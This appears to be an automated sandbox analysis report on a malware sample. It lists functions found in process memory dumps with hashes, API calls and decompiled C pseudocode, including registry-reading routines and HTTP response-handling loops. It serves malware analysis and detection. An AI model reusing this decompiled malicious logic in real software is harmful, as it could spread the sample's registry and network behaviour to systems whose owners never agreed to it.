Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 2b300fc54e88dcf5ac6eb03d9e07801d955113bced32f42f768a1b33f0792536
Instruction ID: 4120f8b2b08f85aa2d5b58677e328f87d64830aad5f439ee6e06c83df97cbcfa
Opcode Fuzzy Hash: 2b300fc54e88dcf5ac6eb03d9e07801d955113bced32f42f768a1b33f0792536
Instruction Fuzzy Hash: D02153B1A0060B9FDB20EF69D88CE5AB7ECFF44704B024566E649DB251D770EA05CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AC470, Relevance: 9.1, APIs: 6, Instructions: 72COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1AC487

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

DName::operator+.LIBCMTD ref: 6E1AC4AC
DName::operator+=.LIBCMTD ref: 6E1AC4CB
DName::DName.LIBVCRUNTIMED ref: 6E1AC4F8

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name$Name::$Name::operator+Name::operator+=Node::makeStatus
String ID:
API String ID: 2485589204-0
Opcode ID: 8d6a16ba0ce6b9ca14f8fb094d10e5c17c778f65f8581380870b761601b657d2
Instruction ID: 50662589026667956caf6fc163a52eed53be63b3981626232e3848ecb6954e64
Opcode Fuzzy Hash: 8d6a16ba0ce6b9ca14f8fb094d10e5c17c778f65f8581380870b761601b657d2
Instruction Fuzzy Hash: 7521B5B4A442189BDF44DFA8E9A5BFE77B9AB42304F008459FA025F281D772A9C4DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5290, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 221timeCOMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMTD ref: 6E1E5325
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1E5443

Part of subcall function 6E1E61B0: __wcstombs_l.LIBCMTD ref: 6E1E61CD

__invoke_watson_if_error.LIBCMTD ref: 6E1E5510

Strings

?, xrefs: 6E1E534B
*, xrefs: 6E1E5347

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: TimevecTimevec::___invoke_watson_if_error__wcstombs_lstd::_std::exception::exception
String ID: *$?
API String ID: 3210742261-2367018687
Opcode ID: de520942f3c43b86ee208adc8aa9727fe09035c948cadf25056f0347b6b020e8
Instruction ID: df986818a559be38f0d3988ef0e5c1f7c2b4955499262931629a4a7c8f18dde8
Opcode Fuzzy Hash: de520942f3c43b86ee208adc8aa9727fe09035c948cadf25056f0347b6b020e8
Instruction Fuzzy Hash: F39137B0D1020DEFCF04DFD4D891BEEB7B9AF54308F608469E4156B681EB70AA85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02C93F60, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02C93F60(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t85;
				void* _t95;
				void* _t96;
				char _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t96 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x2c9d33c);
					_t95 = 0x80000002;
					L6:
					_t60 = E02C91546(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E02C9922B(_t96, _t101, _t105, _t95, _t60) != 0) {
						L27:
						E02C9A5FA(_a8);
						goto L29;
					}
					_t65 =  *0x2c9d2a4; // 0x24aa5a8
					_t16 = _t65 + 0x2c9e8fe; // 0x65696c43
					_t68 = E02C91546(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t69 =  *_t29;
						_t33 = _t105 + 0x10; // 0x3d02c9c0
						if(E02C94413(_t101,  *_t33, _t95, _a8,  *0x2c9d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)(_t69 + 0x2c))) == 0) {
							_t71 =  *0x2c9d2a4; // 0x24aa5a8
							if(_t102 == 0) {
								_t35 = _t71 + 0x2c9ea5f; // 0x4d4c4b48
								_t72 = _t35;
							} else {
								_t34 = _t71 + 0x2c9e89f; // 0x55434b48
								_t72 = _t34;
							}
							if(E02C94744(_t72,  *0x2c9d334,  *0x2c9d338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t74 =  *0x2c9d2a4; // 0x24aa5a8
									_t44 = _t74 + 0x2c9e871; // 0x74666f53
									_t103 = E02C91546(0, _t44);
									if(_t77 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d02c9c0
										E02C927A2( *_t47, _t95, _a8,  *0x2c9d338, _a24);
										_t49 = _t105 + 0x10; // 0x3d02c9c0
										E02C927A2( *_t49, _t95, _t103,  *0x2c9d330, _a16);
										E02C9A5FA(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d02c9c0
									E02C927A2( *_t40, _t95, _a8,  *0x2c9d338, _a24);
									_t43 = _t105 + 0x10; // 0x3d02c9c0
									E02C927A2( *_t43, _t95, _a8,  *0x2c9d330, _a16);
								}
								if( *_t105 != 0) {
									E02C9A5FA(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d02c9c0
					_t85 = E02C95AF6( *_t21, _t95, _a8, _t68,  &_v16,  &_v12);
					if(_t85 == 0) {
						_t104 = _v16;
						if(_v12 == 0x28) {
							 *_t104 =  *_t104 & _t85;
							_t26 = _t105 + 0x10; // 0x3d02c9c0
							E02C94413(_t101,  *_t26, _t95, _a8, _a24, _t104, 0x28);
						}
						E02C9A5FA(_t104);
						_t102 = _a16;
					}
					E02C9A5FA(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t101 = _a8;
					E02C9A88E(_t102, _a8,  &_v284);
					__imp__(_t106 + _t102 - 0x117,  *0x2c9d33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t95 = 0x80000003;
					goto L6;
				}
			}

0x02c93f60
0x02c93f69
0x02c93f70
0x02c93f75
0x02c93fe2
0x02c93fe8
0x02c93fed
0x02c93ff6
0x02c93ffb
0x02c94000
0x02c94173
0x02c9417a
0x02c9417a
0x02c9417f
0x02c94181
0x02c94181
0x02c9418a
0x02c9418a
0x02c94006
0x02c94012
0x02c94169
0x02c9416c
0x00000000
0x02c9416c
0x02c94018
0x02c9401d
0x02c94026
0x02c9402b
0x02c94030
0x02c94079
0x02c94079
0x02c94079
0x02c9408c
0x02c94096
0x02c9409c
0x02c940a3
0x02c940ad
0x02c940ad
0x02c940a5
0x02c940a5
0x02c940a5
0x02c940a5
0x02c940cf
0x02c940d7
0x02c94105
0x02c9410a
0x02c94118
0x02c9411c
0x02c9414e
0x02c9411e
0x02c9412b
0x02c9412e
0x02c9413e
0x02c94141
0x02c94147
0x02c94147
0x02c940d9
0x02c940e6
0x02c940e9
0x02c940fb
0x02c940fe
0x02c940fe
0x02c94158
0x02c94164
0x02c9415a
0x02c9415d
0x02c9415d
0x02c94158
0x02c940cf
0x00000000
0x02c94096
0x02c9403f
0x02c94042
0x02c94049
0x02c9404f
0x02c94052
0x02c94054
0x02c94060
0x02c94063
0x02c94063
0x02c94069
0x02c9406e
0x02c9406e
0x02c94074
0x00000000
0x02c94074
0x02c93f7a
0x00000000
0x02c93fa1
0x02c93fa1
0x02c93fad
0x02c93fc0
0x02c93fc6
0x02c93fce
0x00000000
0x02c93fce

APIs

StrChrA.SHLWAPI(02C986C4,0000005F,00000000,00000000,00000104), ref: 02C93F93
lstrcpy.KERNEL32(?,?), ref: 02C93FC0

Part of subcall function 02C91546: lstrlen.KERNEL32(?,00000000,02C9D330,00000001,02C967F7,02C9D00C,02C9D00C,00000000,00000005,00000000,00000000,?,?,?,02C941AA,02C95D90), ref: 02C9154F
Part of subcall function 02C91546: mbstowcs.NTDLL ref: 02C91576
Part of subcall function 02C91546: memset.NTDLL ref: 02C91588

Part of subcall function 02C927A2: lstrlenW.KERNEL32(?,?,?,02C94133,3D02C9C0,80000002,02C986C4,02C92F48,74666F53,4D4C4B48,02C92F48,?,3D02C9C0,80000002,02C986C4,?), ref: 02C927C7

Part of subcall function 02C9A5FA: HeapFree.KERNEL32(00000000,00000000,02C981B4,00000000,?,?,00000000), ref: 02C9A606

lstrcpy.KERNEL32(?,00000000), ref: 02C93FE2

Strings

\, xrefs: 02C93FC6
(, xrefs: 02C9404B

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 5f33c55f351a5f446e4a4d7b1235f4c7dfed7f81f2a3320923e71b6f3ea644b4
Instruction ID: f2c7b6c324e8728c7257a7c096f10fe957f30a8d880b9745d907f4edd0f0e597
Opcode Fuzzy Hash: 5f33c55f351a5f446e4a4d7b1235f4c7dfed7f81f2a3320923e71b6f3ea644b4
Instruction Fuzzy Hash: D9516E3150020AFFCF25AFA0DD48EAA7BBAFF58704F008515FA16A6160D731DA26EF51

Uniqueness

Uniqueness Score: -1.00%

Function 02C9A961, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,74784D40), ref: 02C9A973

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

ResetEvent.KERNEL32(?), ref: 02C9A9E7
GetLastError.KERNEL32 ref: 02C9AA0A
GetLastError.KERNEL32 ref: 02C9AAB5

Part of subcall function 02C9A5FA: HeapFree.KERNEL32(00000000,00000000,02C981B4,00000000,?,?,00000000), ref: 02C9A606

Strings

@MxtNxt, xrefs: 02C9AA0A, 02C9AAB5

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID: @MxtNxt
API String ID: 943265810-1701360479
Opcode ID: fb185d50f039fb9d490563908d4123226f18f19082726367e68dcc7cc1ccf38b
Instruction ID: af8b38496753b3d5bdea3c4f9d5c10747f977e76d0302d9a49f9deb07938cec3
Opcode Fuzzy Hash: fb185d50f039fb9d490563908d4123226f18f19082726367e68dcc7cc1ccf38b
Instruction Fuzzy Hash: A4417C71940605BFDB31AFA1DD4CE5B7BBDEB89704F104A29F543E2190EB319654CE60

Uniqueness

Uniqueness Score: -1.00%

Function 02C912F8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E02C912F8(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x2c9d138() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x2c9d168(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E02C97E20(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x2c9d138() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E02C966BA( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E02C9A5FA(_v16);
										if(_t64 == 0) {
											_t64 = E02C949F6(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E02C966BA( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E02C95053(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x02c912f8
0x02c912f9
0x02c912ff
0x02c9130a
0x02c9130a
0x02c9130c
0x02c91950
0x02c91955
0x02c91957
0x02c9195c
0x02c9195d
0x02c91962
0x02c91963
0x02c9196e
0x02c9199f
0x02c919a4
0x02c91a67
0x02c919aa
0x02c919b1
0x02c919b9
0x02c91a64
0x02c919bf
0x02c919c4
0x02c919c9
0x02c919ce
0x02c91a56
0x02c919d4
0x02c919d4
0x02c919d6
0x02c919dc
0x02c919dd
0x02c919dd
0x02c919e0
0x02c919e3
0x02c919e9
0x02c919ee
0x02c919ef
0x02c919f4
0x02c919f7
0x02c91a02
0x00000000
0x00000000
0x02c91a0a
0x02c91a12
0x02c91a1e
0x02c91a22
0x02c91a24
0x02c91a29
0x00000000
0x00000000
0x02c91a29
0x02c91a22
0x02c91a3b
0x02c91a3e
0x02c91a45
0x02c91a50
0x02c91a50
0x00000000
0x02c91a2b
0x02c91a2b
0x02c91a30
0x02c91a32
0x02c91a33
0x02c91a36
0x00000000
0x02c91a36
0x00000000
0x02c91a30
0x02c919dd
0x02c91a57
0x02c91a57
0x02c91a5d
0x02c91a5d
0x02c919b9
0x02c91970
0x02c91976
0x02c9197e
0x02c91997
0x02c91999
0x00000000
0x00000000
0x02c91980
0x02c9198a
0x02c9198e
0x02c91994
0x00000000
0x02c91994
0x02c9198e
0x02c9197e
0x02c91a70
0x02c91301
0x02c91301
0x02c91308
0x02c91313
0x00000000
0x00000000
0x00000000
0x02c91308

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,747C81D0), ref: 02C91957
GetLastError.KERNEL32(?,?,?,00000000,747C81D0), ref: 02C91970
ResetEvent.KERNEL32(?), ref: 02C919E9
GetLastError.KERNEL32 ref: 02C91A04

Part of subcall function 02C95053: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,747C81D0), ref: 02C9506A
Part of subcall function 02C95053: SetEvent.KERNEL32(?), ref: 02C9507A

Strings

@MxtNxt, xrefs: 02C91970, 02C91A04

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID: @MxtNxt
API String ID: 1123145548-1701360479
Opcode ID: 37ad3e165d949605a2aee7d127ae4253c134819ef139b9d00598bd472f275066
Instruction ID: b46e95f5a986ad46ab67e1f6c0ed43cea9470466894f357fcf428a7d42b563b3
Opcode Fuzzy Hash: 37ad3e165d949605a2aee7d127ae4253c134819ef139b9d00598bd472f275066
Instruction Fuzzy Hash: 8041F932A40601AFCF119BA5CC4DF6EB7BAEF88364F194525E11AD7190DBB0DE42DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02C95053, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02C95053(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x2c9d140; // 0x2c9ad31
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02C97E20(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E02C9A5FA(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02C966BA( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x02c95053
0x02c95053
0x02c9505d
0x02c95063
0x02c95066
0x02c9506a
0x02c95070
0x02c95075
0x02c9508e
0x02c95091
0x02c95095
0x02c95099
0x02c9509a
0x02c9509f
0x02c950a2
0x02c950a9
0x02c950b0
0x02c95103
0x02c95109
0x02c9510f
0x02c9514a
0x02c95150
0x00000000
0x00000000
0x00000000
0x02c9510f
0x02c950b6
0x00000000
0x02c950bd
0x02c950cb
0x02c950ce
0x02c950d1
0x02c950dd
0x02c950e1
0x02c95143
0x02c950e3
0x02c950e6
0x02c950ea
0x02c950eb
0x02c950ec
0x02c950ee
0x02c950f5
0x02c95133
0x02c9513e
0x02c950f7
0x02c950fa
0x02c950fe
0x02c950fe
0x02c950f5
0x00000000
0x02c950e1
0x02c950b6
0x02c9507a
0x02c95080
0x02c95083
0x02c95088
0x00000000
0x00000000
0x00000000
0x02c95118
0x02c95120
0x02c95125
0x02c95128
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,747C81D0), ref: 02C9506A
SetEvent.KERNEL32(?), ref: 02C9507A
GetLastError.KERNEL32 ref: 02C95103

Part of subcall function 02C966BA: WaitForMultipleObjects.KERNEL32(00000002,02C9AA28,00000000,02C9AA28,?,?,?,02C9AA28,0000EA60), ref: 02C966D5

Part of subcall function 02C9A5FA: HeapFree.KERNEL32(00000000,00000000,02C981B4,00000000,?,?,00000000), ref: 02C9A606

GetLastError.KERNEL32(00000000), ref: 02C95138

Strings

@MxtNxt, xrefs: 02C95103, 02C95138

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID: @MxtNxt
API String ID: 602384898-1701360479
Opcode ID: 96ac7ad206b38d125c320c1ae1e4c55f361f202a6773cd14083715ffea720970
Instruction ID: 6e10e1a8f6cac8d077eb1908dc163263fabb838d8eb8f849caaf2293165e81f4
Opcode Fuzzy Hash: 96ac7ad206b38d125c320c1ae1e4c55f361f202a6773cd14083715ffea720970
Instruction Fuzzy Hash: 8D3130B5D00309EFDF21DFA5CCC8AAEBBB9FB48344F50496AE502A2140D7309B459F50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B19C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1B1A20
DName::DName.LIBVCRUNTIMED ref: 6E1B1AA1
Mailbox.LIBCMTD ref: 6E1B1AC1

Strings

_, xrefs: 6E1B1A15
@, xrefs: 6E1B19F4

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: NameName::$Mailbox
String ID: @$_
API String ID: 4073702289-2246572305
Opcode ID: 0309a6251a34a525f145a3fb9c19c242c6cd7fa4b22852e21c3370726d15d670
Instruction ID: 464e841e01ab8aa75ae4ecfc1d3350b363f45c98e54c0403f7da5e1eb21ebdd7
Opcode Fuzzy Hash: 0309a6251a34a525f145a3fb9c19c242c6cd7fa4b22852e21c3370726d15d670
Instruction Fuzzy Hash: 0B316470A40644DFCF44CFB4EA949B97BF6FB42708F14C69DEA018B284D771A985DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A7F32, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 6E1A6000: ___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A6006
Part of subcall function 6E1A6000: ___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A601C

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7F4F
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7F5A
__IsExceptionObjectToBeDestroyed.LIBVCRUNTIMED ref: 6E1A7FB0
___DestructExceptionObject.LIBCMTD ref: 6E1A7FD5

Strings

csm, xrefs: 6E1A7F68

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ___vcrt_getptd$ExceptionObject$DestroyedDestruct
String ID: csm
API String ID: 485384042-1018135373
Opcode ID: 85820ba2ef65f8871fded07e0189c9b3b1de1bc0df06b3eb76070ebbcc715139
Instruction ID: 995956ca0b8018f99923194b690e5bc195dae0ba890a7f4b59a14275975fd5a0
Opcode Fuzzy Hash: 85820ba2ef65f8871fded07e0189c9b3b1de1bc0df06b3eb76070ebbcc715139
Instruction Fuzzy Hash: 28214A78A01209DFCB04CE98D0506FE7B76AF50309F60846AE6250B286C730DBC5DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A4160, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A4193
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A41A7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A41B7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A41C2

Strings

csm, xrefs: 6E1A4188

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: ac5dbc26a0d7ac45ab71ce9f332131f8080732ccad6ebf7e8bec45b6354ad18b
Instruction ID: e1372eed2380aa457771c0a52395715814964949e3f8505603e37152869c6523
Opcode Fuzzy Hash: ac5dbc26a0d7ac45ab71ce9f332131f8080732ccad6ebf7e8bec45b6354ad18b
Instruction Fuzzy Hash: 9511B77CA00209DFCB04DFECC1405ADBBB5EB58204F1189A9D96597311DB74AA81EB82

Uniqueness

Uniqueness Score: -1.00%

Function 02C9804C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02C9804C(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x2c9d32c; // 0x51495b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2c9d32c; // 0x51495b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x2c9d030) {
					HeapFree( *0x2c9d238, 0, _t8);
				}
				_t14[1] = E02C96BC0(_v0);
				_t11 =  *0x2c9d32c; // 0x51495b0
				_t12 = _t11 + 0x40;
				__imp__(_t12, _t14);
				return _t12;
			}

0x02c9804c
0x02c9804c
0x02c98055
0x02c98065
0x02c98065
0x02c9806a
0x02c9806f
0x00000000
0x00000000
0x02c9805f
0x02c9805f
0x02c98071
0x02c98075
0x02c98087
0x02c98087
0x02c98097
0x02c9809a
0x02c9809f
0x02c980a3
0x02c980a9

APIs

RtlEnterCriticalSection.NTDLL(05149570), ref: 02C98055
Sleep.KERNEL32(0000000A,?,02C95D85), ref: 02C9805F
HeapFree.KERNEL32(00000000,00000000,?,02C95D85), ref: 02C98087
RtlLeaveCriticalSection.NTDLL(05149570), ref: 02C980A3

Strings

Uxt, xrefs: 02C98087

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uxt
API String ID: 58946197-1536154274
Opcode ID: 5703e0052f853629b41fdc244e113e432292cb8f800644b608b017c29cc707a9
Instruction ID: f02699e452f6673ccba05179d92113b56db68547b7503dcf0155fd7a9f781435
Opcode Fuzzy Hash: 5703e0052f853629b41fdc244e113e432292cb8f800644b608b017c29cc707a9
Instruction Fuzzy Hash: 3EF0FE70A401409BDB20AF79D98CF1677E4AF09745F049B45F907D7250C721DA64DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02C95DDD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02C95DDD() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2c9d32c; // 0x51495b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2c9d32c; // 0x51495b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2c9d32c; // 0x51495b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2c9e836) {
					HeapFree( *0x2c9d238, 0, _t10);
					_t7 =  *0x2c9d32c; // 0x51495b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x02c95ddd
0x02c95de6
0x02c95df6
0x02c95df6
0x02c95dfb
0x02c95e00
0x00000000
0x00000000
0x02c95df0
0x02c95df0
0x02c95e02
0x02c95e07
0x02c95e0b
0x02c95e1e
0x02c95e24
